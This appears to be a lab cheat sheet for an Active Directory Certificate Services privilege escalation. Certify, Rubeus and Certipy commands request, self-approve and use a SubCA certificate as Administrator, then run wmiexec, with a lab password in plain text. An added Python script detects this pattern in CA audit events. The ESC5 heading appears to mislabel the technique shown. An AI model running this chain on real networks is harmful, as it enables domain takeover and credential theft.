ESC5
Vulnerable PKI Object Access Control
Windows
Request a certificate using the SubCA template
PS /home/bobbuilder> .\Certify.exe request /ca:WS01.lab.local\lab-WS01-CA /template:SubCA /altname:Administrator
Download Pending Request
PS /home/bobbuilder> .\Certify.exe download /ca:WS01.lab.local\lab-WS01-CA /id:10
Convert the PEM certificate to PFX
openssl pkcs12 -in approved.pem -keyex -CSP "Microsoft Enhanced Cryptographic Provider v1.0" -export -out approved.pfx
Request the TGT and the NT Hash
PS /home/bobbuilder> .\Rubeus.exe asktgt /user:administrator /certificate:approved.pfx /getcredentials
Linux
SSH Port Forwarding
ssh -N -f -D 127.0.0.1:9050 htb-student@<ip>
Request a certificate as the Domain Administrator
bob$ certipy req -u ckenuser1 -p Superman001password1 -dc-ip <ip> -ns <ip> -dns-tcp -target-ip <ip> -ca lab-WS01-CA -template SubCA -upn Administrator
Issue the requested certificate
We approve the previous request by specifying its request ID (10) with the option -issue-request 10
bob$ certipy ca -u ckenuser1 -p Superman001password1 -dc-ip <ip> -ns <ip> -dns-tcp -target-ip <ip> -ca lab-WS01-CA -issue-request 10
Retrieve the issued certificate
We can retrieve the certificate with the option -retrieve 10
bob$ certipy req -u ckenuser1 -p Superman001password1 -dc-ip <ip> -ns <ip> -dns-tcp -target-ip <ip> -ca lab-WS01-CA -retrieve 10
Authenticate with the Administrator Certificate
bob$ certipy auth -pfx administrator.pfx -username administrator -domain lab.local -dc-ip <ip>
Execute wmiexec through proxychains using the TGT
KRB5CCNAME=administrator.ccache proxychains wmiexec.py -k -no-pass LAB-DC.LAB.LOCAL -dc-ip <ip>
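The request flow above leaves a recognisable trail on the CA: a low-privilege requester asks for a SubCA certificate carrying someone else's UPN, the request is parked as pending, and the same account then issues it. The following detection helper is an added example (not part of this page, nor of Certify or Certipy) that walks a list of Certificate Services audit events and flags that pattern. Event IDs 4886 (request received), 4887 (request issued) and 4889 (request set to pending) are real Windows event IDs; the flat dict layout, the field names (requester, template, san_upn, issued_by) and the sample events themselves are constructed assumptions so the script runs offline.

```python
"""Flag certificate issuances that match the pending-then-issued SubCA pattern.

Added example, not code from the original page or from Certify/Certipy.
Assumed event format: one dict per CA audit event with the keys
event_id, request_id, requester, template, san_upn and (for 4887) issued_by.
"""
from collections import defaultdict

# Constructed sample events (not captured from a real CA).
SAMPLE_EVENTS = [
    # Request 9: ordinary User certificate, SAN matches the requester.
    {"event_id": 4886, "request_id": 9, "requester": "LAB\\ckenuser1",
     "template": "User", "san_upn": "ckenuser1@lab.local"},
    {"event_id": 4887, "request_id": 9, "requester": "LAB\\ckenuser1",
     "template": "User", "san_upn": "ckenuser1@lab.local", "issued_by": None},
    # Request 10: SubCA template, SAN for Administrator, set to pending,
    # then issued by the requester's own account.
    {"event_id": 4886, "request_id": 10, "requester": "LAB\\ckenuser1",
     "template": "SubCA", "san_upn": "Administrator@lab.local"},
    {"event_id": 4889, "request_id": 10, "requester": "LAB\\ckenuser1",
     "template": "SubCA", "san_upn": "Administrator@lab.local"},
    {"event_id": 4887, "request_id": 10, "requester": "LAB\\ckenuser1",
     "template": "SubCA", "san_upn": "Administrator@lab.local",
     "issued_by": "LAB\\ckenuser1"},
]


def requester_account(requester):
    """Strip a DOMAIN\\ prefix and normalise case."""
    return requester.split("\\", 1)[-1].lower()


def san_account(san_upn):
    """Return the account part of a UPN, or None when no SAN UPN was set."""
    return san_upn.split("@", 1)[0].lower() if san_upn else None


def find_suspicious_issuances(events, privileged_templates=("SubCA",)):
    """Group events by request ID and report issued requests that look like
    the chain above: SAN UPN differs from the requester, a privileged
    template was used, or a pending request was issued by its own requester."""
    by_id = defaultdict(list)
    for e in events:
        by_id[e["request_id"]].append(e)

    findings = []
    for rid, evs in sorted(by_id.items()):
        issued = [e for e in evs if e["event_id"] == 4887]
        if not issued:
            continue  # never issued: nothing usable came out of the CA
        final = issued[-1]
        reasons = []
        if san_account(final.get("san_upn")) not in (None, requester_account(final["requester"])):
            reasons.append("SAN UPN differs from requester")
        if final.get("template") in privileged_templates:
            reasons.append("privileged template %s" % final["template"])
        was_pending = any(e["event_id"] == 4889 for e in evs)
        issuer = final.get("issued_by")
        if was_pending and issuer and requester_account(issuer) == requester_account(final["requester"]):
            reasons.append("pending request issued by its own requester")
        if reasons:
            findings.append({"request_id": rid, "requester": final["requester"], "reasons": reasons})
    return findings


if __name__ == "__main__":
    for f in find_suspicious_issuances(SAMPLE_EVENTS):
        print("request %(request_id)s by %(requester)s: %(reasons)s" % f)
```

In practice the events would come from the CA's Security log (with Certificate Services auditing enabled) rather than the inline list, and the "issued by" attribution would be taken from the separate approval event; the three checks are independent, so a hit on any one of them is worth a look even when the others are absent.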